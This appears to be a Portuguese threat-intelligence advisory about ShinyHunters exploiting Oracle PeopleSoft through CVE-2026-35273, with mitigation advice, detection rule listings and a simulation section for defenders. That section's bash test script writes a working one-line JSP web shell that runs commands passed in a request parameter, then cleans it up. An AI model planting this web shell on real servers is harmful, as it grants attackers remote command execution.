SOC Prime Bias: Critical

01 Oct 2026 07:53 UTC

ShinyHunters Retoma Ataques em Grande Escala Visando Oracle PeopleSoft

Author Photo
SOC Prime Team linkedin icon Seguir
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O ator da ameaça UNC6240 (ShinyHunters) retomou a exploração em larga escala de sistemas Oracle PeopleSoft através da CVE-2026-35273. A campanha utiliza caminhos codificados em URL para contornar Firewalls de Aplicações Web (WAF) e acessar o ponto de extremidade vulnerável do Hub de Gerenciamento de Ambiente. Os atacantes implantam múltiplos shells web juntamente com o backdoor SIDEEYE para estabelecer persistência, manter acesso não autorizado e facilitar a exfiltração de dados.

Investigação

Mandiant e Google Threat Intelligence Group documentaram uma transição da exploração de dia zero em junho de 2026 para ataques de N-days contra ambientes não corrigidos. Pesquisadores identificaram o uso de codificação URL (/PSEMHUB/) para evitar a filtragem de strings baseada em WAF. A análise revelou uma sequência de ataque recorrente envolvendo a validação de alvos através de objetos Java serializados, seguida pela implantação de instaladores trojanizados e utilitários de tunelamento.

Mitigação

As organizações devem instalar imediatamente o patch de Alerta de Segurança da Oracle que aborda a CVE-2026-35273 e desabilitar ou remover o aplicativo PSEMHUB. As configurações do WAF devem inspecionar e bloquear caminhos de URL normalizados em vez de depender exclusivamente da correspondência literal de strings. As equipes de segurança também devem rotacionar credenciais acessíveis do nível web e examinar diretórios de aplicativos em busca de arquivos suspeitos ou não autorizados.

Resposta

Se um shell web for descoberto, os defensores devem considerar o host afetado como totalmente comprometido e preservar evidências forenses antes de iniciar a remediação. Ativar auditoria em nível de host para identificar processos de shell inesperados lançados pelo processo Java do WebLogic. Rotacionar credenciais expostas, incluindo strings de conexão de banco de dados e credenciais de nuvem, enquanto revisa atividades de rede de saída em busca de indicadores de C2 conhecidos.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Possível Enumeração do Sistema (via linha de comando)

Equipe SOC Prime
29 Set 2026

Comando e Controle Suspeito por Solicitação DNS de Domínio de Topo (TLD) Incomum (via dns)

Equipe SOC Prime
29 Set 2026

Possível Manipulação de Strings Codificadas em Base64 (via linha de comando)

Equipe SOC Prime
29 Set 2026

Upload / Download Remoto de Arquivo via Ferramentas Padrão (via linha de comando)

Equipe SOC Prime
29 Set 2026

IOCs (HashSha256) para detectar: Campanha de Exploração em Massa Renovada dos ShinyHunters Alvejando Oracle PeopleSoft

Regras de IA do SOC Prime
29 Set 2026

IOCs (SourceIP) para detectar: Campanha de Exploração em Massa Renovada dos ShinyHunters Alvejando Oracle PeopleSoft

Regras de IA do SOC Prime
29 Set 2026

IOCs (DestinationIP) para detectar: Campanha de Exploração em Massa Renovada dos ShinyHunters Alvejando Oracle PeopleSoft

Regras de IA do SOC Prime
29 Set 2026

Implantação de Shell Web via Exploração da CVE-2026-35273 [Criação de Processo no Windows]

Regras de IA do SOC Prime
29 Set 2026

Exploração pela UNC6240 do Oracle PeopleSoft usando Web Shells [Servidor Web]

Regras de IA do SOC Prime
29 Set 2026

Execução de Simulação

  • Narrativa do Ataque & Comandos: O adversário identifica uma instância do Oracle PeopleSoft e procura explorar uma vulnerabilidade. Para contornar assinaturas WAF simples que procuram a string “PSEMHUB”, o atacante usa codificação de URL para solicitar /PSEMHUB/. Após a exploração bem-sucedida, o atacante insere um shell web chamado x.jsp na raiz da web para fornecer uma interface persistente para a execução de comandos. Esta sequência imita os indicadores específicos de comprometimento (IOCs) identificados na campanha de exploração da UNC6240.

  • Script de Teste de Regressão:

    #!/bin/bash
    # Script de Simulação para Detecção de Shell Web UNC6240
    
    # 1. Definir caminhos (Ajustar com base no ambiente de destino)
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    TARGET_URL="http://localhost/PSEMHUB/"
    
    echo "[+] Criando shell web simulado: $WEB_ROOT/$SHELL_NAME"
    # Criar um conteúdo simples de shell web JSP
    echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null
    
    echo "[+] Disparando detecção via solicitação codificada por URL..."
    # Use curl para solicitar o caminho codificado para gerar a entrada no log
    curl -s "$TARGET_URL" > /dev/null
    
    echo "[+] Simulação completa. Verifique o SIEM para detecção."
  • Comandos de Limpeza:

    #!/bin/bash
    # Script de Limpeza
    
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    
    echo "[+] Limpando arquivos de simulação..."
    sudo rm -f $WEB_ROOT/$SHELL_NAME
    echo "[+] Limpeza finalizada."